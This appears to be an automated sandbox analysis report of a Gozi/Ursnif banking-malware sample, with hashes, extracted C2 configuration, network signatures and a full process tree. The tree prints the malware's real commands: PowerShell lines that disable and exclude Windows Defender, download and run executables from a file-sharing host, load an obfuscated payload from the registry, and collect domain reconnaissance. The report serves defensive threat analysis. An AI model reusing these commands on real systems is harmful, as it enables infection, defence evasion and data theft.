Analysis
-
max time kernel
150s -
max time network
138s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
22/03/2022, 14:51
Static task
static1
Behavioral task
behavioral1
Sample
6239dfea99c25.exe
Resource
win7-20220310-en
General
-
Target
6239dfea99c25.exe
-
Size
154KB
-
MD5
b5946ff13e7698c7e2f26491885ddaab
-
SHA1
5a30f2c32c05cdf7ea86a916bb7b529c647e56b4
-
SHA256
b6814794481de92b96493819677c96320d500487b82fd6eb72018faba8a831eb
-
SHA512
4b296cc73916bf75bc1ab0feadf076b1794a88ba83663c1803e3342b14ff223b85f4d27b86c244088aa8f3eef309b1948f0db9ff71775f7d6e7759ca76b6dca7
Malware Config
Extracted
gozi_ifsb
3000
config.edge.skype.com
194.76.226.200
giporedtrip.at
habpfans.at
31.214.157.187
-
base_path
/drew/
-
build
250225
-
exe_type
loader
-
extension
.jlk
-
server_id
50
Extracted
gozi_ifsb
3000
config.edge.skype.com
194.76.226.200
giporedtrip.at
habpfans.at
31.214.157.187
-
base_path
/images/
-
build
250225
-
exe_type
worker
-
extension
.jlk
-
server_id
50
Signatures
-
suricata: ET MALWARE Ursnif Payload Request (cook32.rar)
suricata: ET MALWARE Ursnif Payload Request (cook32.rar)
-
suricata: ET MALWARE Ursnif Payload Request (cook64.rar)
suricata: ET MALWARE Ursnif Payload Request (cook64.rar)
-
suricata: ET MALWARE Ursnif Variant CnC Beacon
suricata: ET MALWARE Ursnif Variant CnC Beacon
-
suricata: ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)
suricata: ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)
-
suricata: ET MALWARE Ursnif Variant CnC Data Exfil
suricata: ET MALWARE Ursnif Variant CnC Data Exfil
-
Blocklisted process makes network request 4 IoCs
flow pid Process 11 4524 powershell.exe 13 4524 powershell.exe 16 2332 powershell.exe 17 2332 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
pid Process 4712 looad.exe 872 load.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation looad.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation mshta.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce 6239dfea99c25.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 6239dfea99c25.exe -
Suspicious use of SetThreadContext 7 IoCs
description pid Process procid_target PID 1524 set thread context of 2688 1524 powershell.exe 44 PID 2688 set thread context of 3544 2688 Explorer.EXE 22 PID 2688 set thread context of 2296 2688 Explorer.EXE 113 PID 2688 set thread context of 3840 2688 Explorer.EXE 40 PID 2296 set thread context of 2584 2296 cmd.exe 115 PID 2688 set thread context of 3272 2688 Explorer.EXE 38 PID 2688 set thread context of 1912 2688 Explorer.EXE 123 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Discovers systems in the same network 1 TTPs 3 IoCs
pid Process 4612 net.exe 4576 net.exe 4120 net.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 3124 tasklist.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 1988 systeminfo.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2584 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2584 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2252 powershell.exe 2252 powershell.exe 4524 powershell.exe 4524 powershell.exe 1816 powershell.exe 1816 powershell.exe 4848 powershell.exe 4848 powershell.exe 2932 powershell.exe 2932 powershell.exe 228 powershell.exe 228 powershell.exe 2956 powershell.exe 2956 powershell.exe 2332 powershell.exe 2332 powershell.exe 872 load.exe 872 load.exe 1524 powershell.exe 1524 powershell.exe 2688 Explorer.EXE 2688 Explorer.EXE 2688 Explorer.EXE 2688 Explorer.EXE 2688 Explorer.EXE 2688 Explorer.EXE 2688 Explorer.EXE 2688 Explorer.EXE 2688 Explorer.EXE 2688 Explorer.EXE 2688 Explorer.EXE 2688 Explorer.EXE 2688 Explorer.EXE 2688 Explorer.EXE 2688 Explorer.EXE 2688 Explorer.EXE 2688 Explorer.EXE 2688 Explorer.EXE 2688 Explorer.EXE 2688 Explorer.EXE 2688 Explorer.EXE 2688 Explorer.EXE 2688 Explorer.EXE 2688 Explorer.EXE 2688 Explorer.EXE 2688 Explorer.EXE 2688 Explorer.EXE 2688 Explorer.EXE 2688 Explorer.EXE 2688 Explorer.EXE 2688 Explorer.EXE 2688 Explorer.EXE 2688 Explorer.EXE 2688 Explorer.EXE 2688 Explorer.EXE 2688 Explorer.EXE 2688 Explorer.EXE 2688 Explorer.EXE 2688 Explorer.EXE 2688 Explorer.EXE 2688 Explorer.EXE 2688 Explorer.EXE 2688 Explorer.EXE 2688 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2688 Explorer.EXE -
Suspicious behavior: MapViewOfSection 7 IoCs
pid Process 1524 powershell.exe 2688 Explorer.EXE 2688 Explorer.EXE 2688 Explorer.EXE 2296 cmd.exe 2688 Explorer.EXE 2688 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 18 IoCs
description pid Process Token: SeDebugPrivilege 2252 powershell.exe Token: SeDebugPrivilege 4524 powershell.exe Token: SeDebugPrivilege 1816 powershell.exe Token: SeDebugPrivilege 4848 powershell.exe Token: SeDebugPrivilege 2932 powershell.exe Token: SeDebugPrivilege 228 powershell.exe Token: SeDebugPrivilege 2956 powershell.exe Token: SeDebugPrivilege 2332 powershell.exe Token: SeDebugPrivilege 1524 powershell.exe Token: SeShutdownPrivilege 2688 Explorer.EXE Token: SeCreatePagefilePrivilege 2688 Explorer.EXE Token: SeShutdownPrivilege 2688 Explorer.EXE Token: SeCreatePagefilePrivilege 2688 Explorer.EXE Token: SeShutdownPrivilege 2688 Explorer.EXE Token: SeCreatePagefilePrivilege 2688 Explorer.EXE Token: SeDebugPrivilege 3124 tasklist.exe Token: SeShutdownPrivilege 2688 Explorer.EXE Token: SeCreatePagefilePrivilege 2688 Explorer.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2688 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1488 wrote to memory of 1708 1488 6239dfea99c25.exe 80 PID 1488 wrote to memory of 1708 1488 6239dfea99c25.exe 80 PID 1708 wrote to memory of 2252 1708 cmd.exe 82 PID 1708 wrote to memory of 2252 1708 cmd.exe 82 PID 1708 wrote to memory of 4524 1708 cmd.exe 83 PID 1708 wrote to memory of 4524 1708 cmd.exe 83 PID 1708 wrote to memory of 4712 1708 cmd.exe 84 PID 1708 wrote to memory of 4712 1708 cmd.exe 84 PID 4712 wrote to memory of 1608 4712 looad.exe 85 PID 4712 wrote to memory of 1608 4712 looad.exe 85 PID 1608 wrote to memory of 1816 1608 cmd.exe 87 PID 1608 wrote to memory of 1816 1608 cmd.exe 87 PID 1608 wrote to memory of 4848 1608 cmd.exe 90 PID 1608 wrote to memory of 4848 1608 cmd.exe 90 PID 1608 wrote to memory of 2932 1608 cmd.exe 92 PID 1608 wrote to memory of 2932 1608 cmd.exe 92 PID 1608 wrote to memory of 228 1608 cmd.exe 94 PID 1608 wrote to memory of 228 1608 cmd.exe 94 PID 1608 wrote to memory of 2956 1608 cmd.exe 96 PID 1608 wrote to memory of 2956 1608 cmd.exe 96 PID 1608 wrote to memory of 2332 1608 cmd.exe 97 PID 1608 wrote to memory of 2332 1608 cmd.exe 97 PID 1608 wrote to memory of 872 1608 cmd.exe 100 PID 1608 wrote to memory of 872 1608 cmd.exe 100 PID 1608 wrote to memory of 872 1608 cmd.exe 100 PID 404 wrote to memory of 1524 404 mshta.exe 107 PID 404 wrote to memory of 1524 404 mshta.exe 107 PID 1524 wrote to memory of 5048 1524 powershell.exe 109 PID 1524 wrote to memory of 5048 1524 powershell.exe 109 PID 5048 wrote to memory of 4536 5048 csc.exe 110 PID 5048 wrote to memory of 4536 5048 csc.exe 110 PID 1524 wrote to memory of 1816 1524 powershell.exe 111 PID 1524 wrote to memory of 1816 1524 powershell.exe 111 PID 1816 wrote to memory of 4216 1816 csc.exe 112 PID 1816 wrote to memory of 4216 1816 csc.exe 112 PID 1524 wrote to memory of 2688 1524 powershell.exe 44 PID 1524 wrote to memory of 2688 1524 powershell.exe 44 PID 1524 wrote to memory of 2688 1524 powershell.exe 44 PID 1524 wrote to memory of 2688 1524 powershell.exe 44 PID 2688 wrote to memory of 3544 2688 Explorer.EXE 22 PID 2688 wrote to memory of 3544 2688 Explorer.EXE 22 PID 2688 wrote to memory of 2296 2688 Explorer.EXE 113 PID 2688 wrote to memory of 2296 2688 Explorer.EXE 113 PID 2688 wrote to memory of 2296 2688 Explorer.EXE 113 PID 2688 wrote to memory of 3544 2688 Explorer.EXE 22 PID 2688 wrote to memory of 3544 2688 Explorer.EXE 22 PID 2688 wrote to memory of 3840 2688 Explorer.EXE 40 PID 2688 wrote to memory of 3840 2688 Explorer.EXE 40 PID 2688 wrote to memory of 2296 2688 Explorer.EXE 113 PID 2688 wrote to memory of 2296 2688 Explorer.EXE 113 PID 2296 wrote to memory of 2584 2296 cmd.exe 115 PID 2296 wrote to memory of 2584 2296 cmd.exe 115 PID 2296 wrote to memory of 2584 2296 cmd.exe 115 PID 2688 wrote to memory of 3840 2688 Explorer.EXE 40 PID 2688 wrote to memory of 3840 2688 Explorer.EXE 40 PID 2688 wrote to memory of 3272 2688 Explorer.EXE 38 PID 2688 wrote to memory of 3272 2688 Explorer.EXE 38 PID 2296 wrote to memory of 2584 2296 cmd.exe 115 PID 2296 wrote to memory of 2584 2296 cmd.exe 115 PID 2688 wrote to memory of 3272 2688 Explorer.EXE 38 PID 2688 wrote to memory of 3272 2688 Explorer.EXE 38 PID 2688 wrote to memory of 4848 2688 Explorer.EXE 116 PID 2688 wrote to memory of 4848 2688 Explorer.EXE 116 PID 4848 wrote to memory of 220 4848 cmd.exe 118
Processes
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3544
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3272
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3840
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2688 -
C:\Users\Admin\AppData\Local\Temp\6239dfea99c25.exe"C:\Users\Admin\AppData\Local\Temp\6239dfea99c25.exe"2⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1488 -
C:\Windows\SYSTEM32\cmd.execmd /c bruhad.bat3⤵
- Suspicious use of WriteProcessMemory
PID:1708 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Add-MpPreference -ExclusionPath "C:\Users"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2252
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest -uri https://filebin.net/ezig0gb1jw3em8r7/looad.exe -o looad.exe"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4524
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\looad.exelooad.exe4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4712 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\65BC.tmp\65BD.tmp\65BE.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\looad.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:1608 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Remove-MpThreat"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1816
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Set-MpPreference -ExclusionExtension exe"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4848
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Add-MpPreference -ExclusionPath "C:\Users"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2932
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Set-MpPreference -MAPSReporting 0ΓÇï"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:228
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -command "Set-MpPreference -SubmitSamplesConsent 2"ΓÇï6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2956
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest -uri https://filebin.net/ezig0gb1jw3em8r7/load.exe -o load.exe"6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2332
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\load.exeload.exe6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:872
-
-
-
-
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Y03p='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Y03p).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\3B357854-5E29-2581-409F-72297443C66D\\\PlayStop'));if(!window.flag)close()</script>"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:404 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xadjxtwdw -value gp; new-alias -name lhnwkd -value iex; lhnwkd ([System.Text.Encoding]::ASCII.GetString((xadjxtwdw "HKCU:Software\AppDataLow\Software\Microsoft\3B357854-5E29-2581-409F-72297443C66D").StopLocal))3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1524 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x3inmo35\x3inmo35.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:5048 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2572.tmp" "c:\Users\Admin\AppData\Local\Temp\x3inmo35\CSCAD89A661A4034B56BD98BEBDC6FA94CA.TMP"5⤵PID:4536
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3kgaxgp0\3kgaxgp0.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:1816 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES268C.tmp" "c:\Users\Admin\AppData\Local\Temp\3kgaxgp0\CSC6E24615EF38442F7BFB7EE57DB209138.TMP"5⤵PID:4216
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\load.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2296 -
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2584
-
-
-
C:\Windows\system32\cmd.execmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\EE19.bi1"2⤵
- Suspicious use of WriteProcessMemory
PID:4848 -
C:\Windows\system32\nslookup.exenslookup myip.opendns.com resolver1.opendns.com3⤵PID:220
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\EE19.bi1"2⤵PID:920
-
-
C:\Windows\system32\cmd.execmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"2⤵PID:4144
-
C:\Windows\system32\systeminfo.exesysteminfo.exe3⤵
- Gathers system information
PID:1988
-
-
-
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵PID:1912
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"2⤵PID:3596
-
-
C:\Windows\system32\cmd.execmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"2⤵PID:3664
-
C:\Windows\system32\net.exenet view3⤵
- Discovers systems in the same network
PID:4612
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"2⤵PID:1672
-
-
C:\Windows\system32\cmd.execmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"2⤵PID:1808
-
C:\Windows\system32\nslookup.exenslookup 127.0.0.13⤵PID:3988
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"2⤵PID:4616
-
-
C:\Windows\system32\cmd.execmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"2⤵PID:3556
-
C:\Windows\system32\tasklist.exetasklist.exe /SVC3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3124
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"2⤵PID:4760
-
-
C:\Windows\system32\cmd.execmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"2⤵PID:3920
-
C:\Windows\system32\driverquery.exedriverquery.exe3⤵PID:2800
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"2⤵PID:2696
-
-
C:\Windows\system32\cmd.execmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"2⤵PID:2132
-
C:\Windows\system32\reg.exereg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s3⤵PID:4148
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"2⤵PID:4904
-
-
C:\Windows\system32\cmd.execmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"2⤵PID:5088
-
C:\Windows\system32\net.exenet config workstation3⤵PID:4236
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 config workstation4⤵PID:2100
-
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"2⤵PID:4536
-
-
C:\Windows\system32\cmd.execmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"2⤵PID:4216
-
C:\Windows\system32\nltest.exenltest /domain_trusts3⤵PID:1992
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"2⤵PID:1436
-
-
C:\Windows\system32\cmd.execmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"2⤵PID:1980
-
C:\Windows\system32\nltest.exenltest /domain_trusts /all_trusts3⤵PID:3696
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"2⤵PID:2384
-
-
C:\Windows\system32\cmd.execmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"2⤵PID:4664
-
C:\Windows\system32\net.exenet view /all /domain3⤵
- Discovers systems in the same network
PID:4576
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"2⤵PID:4328
-
-
C:\Windows\system32\cmd.execmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"2⤵PID:2292
-
C:\Windows\system32\net.exenet view /all3⤵
- Discovers systems in the same network
PID:4120
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"2⤵PID:2728
-
-
C:\Windows\system32\cmd.execmd /U /C "type C:\Users\Admin\AppData\Local\Temp\8D5F.bin1 > C:\Users\Admin\AppData\Local\Temp\8D5F.bin & del C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"2⤵PID:696
-